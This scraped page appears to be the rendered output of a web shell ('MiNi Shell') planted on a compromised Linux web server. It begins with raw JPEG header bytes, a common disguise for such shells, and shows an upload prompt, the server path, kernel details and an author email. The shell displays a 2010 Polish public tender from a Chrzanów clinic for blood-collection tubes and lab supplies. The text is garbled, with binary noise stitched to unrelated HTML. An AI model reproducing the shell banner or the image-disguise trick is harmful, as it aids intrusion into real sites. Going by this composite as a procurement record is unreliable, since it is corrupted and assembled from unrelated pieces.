JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101202/392664-N-2010.html

<p class="kh_header"><b>Chrzanów: Dostawa sprzętu jednorazowego użytku ,probówek do mikrometody i systemu zamkniętego do pobierania krwi. Zamówienie podzielono na trzy części .</b><br>
<b>Numer ogłoszenia: 392664 - 2010; data zamieszczenia: 02.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Lecznictwa Ambulatoryjnego w Chrzanowie , ul. Sokoła 19, 32-500 Chrzanów, woj. małopolskie, tel. 0-32 6240325, faks 0-32 6240310.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zla.chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego użytku ,probówek do mikrometody i systemu zamkniętego do pobierania krwi. Zamówienie podzielono na trzy części ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I -Zamknięty system  aspiracyjno-próżniowy do pobierania krwi 

Probówki do koagulologii z 3,2 % cytrynianem sodu na 1,8 - 3 ml krwi	 4000 sztuk	Średnica: 12-13 mm wysokość: 65-75 mm
Probówki hematologiczne z EDTA-K3 na 2- 3  ml krwi  	17000 sztuk 	Średnica ;12-13 mm wysokość: 65-75 mm
Probówki hematologiczne z EDTA-K3 na4,0 - 6,0 ml	650sztuk	Średnica ;   15 mm wysokość ; 75 mm
 Probówki do pozyskiwania surowicy z  przyspieszaczem wykrzepiania o obj. pobrania 4,5 - 5,5 ml krwi  	 20000 sztuk	Średnica :12-13 mm wysokość: 65-100 mm
Probówki do pozyskiwania surowicy z  przyspieszaczem wykrzepiania o obj. pobrania 2 - 3 ml krwi ml 	 6000 sztuk	 Średnica :12-13 mm wysokość: 65-75 mm
Probówki do analizy glukozy na 2 - 3 ml krwi z NaF i EDTA	 3000 sztuk	Średnica :12-13 mm wysokość: 65-75 mm
Probówka do OB  z 3,8 % cytrynianem o obj pobrania 1,2-  2 ml krwi  	 3500 sztuk	Jeżeli do zastosowania z rurką , proszę uwzględnić taką samą ilość rurek z podziałką,
Probówka do OB  z 3,8% cytrynianem  o obj pobrania 2,1 - 3,5  ml krwi 	 13000 sztuk 	Jeżeli do zastosowania z rurką , proszę uwzględnić taką samą ilość rurek z podziałką
Igła systemowa o wymiarach 0,9 mm x 38mm - 40 mm( 20 G)	20000 sztuk 	  
Igła systemowa o wymiarach 0,8 mm x 38 mm - 40 mm( 21G )	 15000 sztuk	 
Igła systemowa o wymiarach 0,7 mm x 38 mm - 40 mm( 22G )	3000 sztuk	
Igła motylkowa do pobrań krwi z trudnych żył 0,9 mm z  drenem o dł. 50 - 120 mm dostosowana do oferowanego systemu 	 1500 sztuk	 
Igła motylkowa do pobrań krwi z trudnych żył 0,8 mm z  drenem o dł. 50 - 120 mm dostosowana do oferowanego systemu	1500 sztuk	
Probówki hematologiczne - pedriatyczne o obj. pobrania od 1,0 - 1,5 ml krwi	5000 sztuk	Średnica : 10-12 mm wysokość: 65-75 mm
Probówki do pozyskania surowicy-  pedriatyczne o obj. pobrania 1,0  - 1,5 ml krwi 	3000 sztuk	Średnica: 10-12mm wysokość : 65-75 mm
Probówki do koagulologii - pedriatyczne o obj. pobrania od 1,4 - 1,8 ml krwi	2000 sztuk	Średnica 10-12 mm wysokość: 65-75 mm
Opaska uciskowa dla dorosłych	2 sztuk 	
Opaska uciskowa dla dzieci	1 sztuki	

Część II -Sprzęt jednorazowy

Probówki typu Eppendorf  stożkowe na 1,5 ml- bezbarwne	 1000 sztuk	16 opak.16000 sztuk 
Naczyńka z PS o poj. 3ml do Hitachi	1000 sztuk	12 opak12000 sztuk
Probówki do badania osadu o poj. 10 -12 ml z wgłębieniem na osad 0,5 ml z PS	500 sztuk 	30 opak15000 sztuk
Kuwety z PS  macro dwuścienne o poj 4,5 ml	100 sztuk	10 opak1000 sztuk
Końcówki do pipet o poj. do 1000 ul typu Eppendorf- niebieskie	500 sztuk	 40 opak20000 sztuk
Końcówki do pipet o poj do 200 ul typu Gilson - żółte	1000 sztuk	50 opak50000 sztuk
Nakłuwacze igłowe pediatryczne  1,8 mm	200 sztuk 	12 opak2400 sztuk
Nakłuwacze igłowe dla dorosłych 2,4 mm	200 sztuk	3 opak600 sztuk
Pojemniki z tworzywa na odpady medyczne z PP o poj. 1 litra z pokrywą i otworem wrzutowym	20 sztuk	15 opak300 sztuk
Pojemniki z tworzywa na odpady medyczne z PP o poj. 5 litrów z pokrywą 	10 sztuk 	15 opak150 sztuk
Szkiełka mikroskopowe podstawowe cienkie-76x26x1 mm ze szlifowanymi krawędziami	50 sztuk	24 opak1200 sztuk
Jednorazowe kamery do badania osadu moczu na 10 oznaczeń każda	 100 sztuk	 12opak.1200 sztuk
Pipety stałopojemnościowe z wyrzutnikiem końcówek i wydmuchem o poj. 100ul (minimum 2 lata gwarancji) 	1 sztuka	1 sztuka
Pipeta stałopojemnościowa z wyrzutnikiem i wydmuchem o poj. 50ul (minimum 2 lata gwarancji)	1 sztuka	1 sztuka
Pipeta zmiennopojemnościowa z wyrzutnikiem i wydmuchem o poj. 10 - 100 ul (minimum 2 lata gwarancji)	1 sztuka	1 sztuka
Pipeta zmiennopojemnościowa z wyrzutnikiem i wydmuchem o poj. 100 - 1000ul (minimum 2 lata gwarancji)	1 sztuki 	2 sztuki
Statyw na 90 probówek o średnicy  probówki 13 mm,    rzędowy z PP o wys. 60-70mm	1 sztuka 	2 sztuka
Statyw na 50 probówek o średnicy  probówki 13 mm,    rzędowy z PP o wys. 65-75mm	1 sztuka 	2 sztuka
Pudełko (statyw) n 20 -30 probówek o poj. 1 - ml z przykrywką	1 sztuka	2 sztuki
Statyw roboczy na 40 -50 probówek o poj. 1 - 2 ml z nóżkami stabilizującymi	1 sztuka	2 sztuki
Pojemnik z pokrywką do przechowywania wyrobów jednorazowych( końcówki, naczyńka) z plexi bezbarwne - małe 15x25x30	1 sztuka	2 sztuki
Cylindry szklane o poj 50 ml	1 sztuka 	2sztuk

Część III- MIKROMETODA

Probówki z fluorkiem sodu z kapilarą do krwi włośniczkowej na glukozę o poj. 200 ul krwi	 50 lub 100 sztuk w opak.	200 sztuk.
Probówki z EDTA z kapilarą do krwi włośniczkowej na morfologię o poj.200 ul krwi	50 lub 100 sztuk w opak	500 sztuk
Probówki z EDTA z kapilarą do krwi włośniczkowej na morfologię o poj.100 ul krwi	50 lub 100 sztuk w opak	1500 sztuk
Probówki do barwienia i zliczania retikulocytów na 120 ul krwi	50 lub 100 sztuk w opak	600 sztuk.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.13.00-3, 33.19.25.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy : 
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności poprzez wykazanie : 
iż  Wykonawca został zarejestrowany we właściwym ,ze względu na formę organizacyjna ,w jakiej prowadzi działalność  ,rejestrze ( aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej ,jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej) 
2.	posiadają  wiedzę i doświadczenie 
3.	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
4.	spełniają warunki dotyczące sytuacji ekonomicznej i finansowej
Ocena spełnienia w/w warunków odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiający na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy : 
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności poprzez wykazanie : 
iż  Wykonawca został zarejestrowany we właściwym ,ze względu na formę organizacyjna ,w jakiej prowadzi działalność  ,rejestrze ( aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej ,jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej) 
2.	posiadają  wiedzę i doświadczenie 
3.	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
4.	spełniają warunki dotyczące sytuacji ekonomicznej i finansowej
Ocena spełnienia w/w warunków odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiający na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy : 
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności poprzez wykazanie : 
iż  Wykonawca został zarejestrowany we właściwym ,ze względu na formę organizacyjna ,w jakiej prowadzi działalność  ,rejestrze ( aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej ,jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej) 
2.	posiadają  wiedzę i doświadczenie 
3.	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
4.	spełniają warunki dotyczące sytuacji ekonomicznej i finansowej
Ocena spełnienia w/w warunków odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiający na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy : 
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności poprzez wykazanie : 
iż  Wykonawca został zarejestrowany we właściwym ,ze względu na formę organizacyjna ,w jakiej prowadzi działalność  ,rejestrze ( aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej ,jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej) 
2.	posiadają  wiedzę i doświadczenie 
3.	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
4.	spełniają warunki dotyczące sytuacji ekonomicznej i finansowej
Ocena spełnienia w/w warunków odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiający na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy : 
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności poprzez wykazanie : 
iż  Wykonawca został zarejestrowany we właściwym ,ze względu na formę organizacyjna ,w jakiej prowadzi działalność  ,rejestrze ( aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej ,jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej) 
2.	posiadają  wiedzę i doświadczenie 
3.	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
4.	spełniają warunki dotyczące sytuacji ekonomicznej i finansowej
Ocena spełnienia w/w warunków odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiający na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zla.chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Lecznictwa Ambulatoryjnego
32-500 Chrzanów ul. Sokoła19
tel/fax.(032) 624 03 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2010 godzina 10:00, miejsce: Sekretariat Zakładu Lecznictwa Ambulatoryjnego II piętro
32-500 Chrzanów ul. Sokoła19
tel/fax.(032) 624 03 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com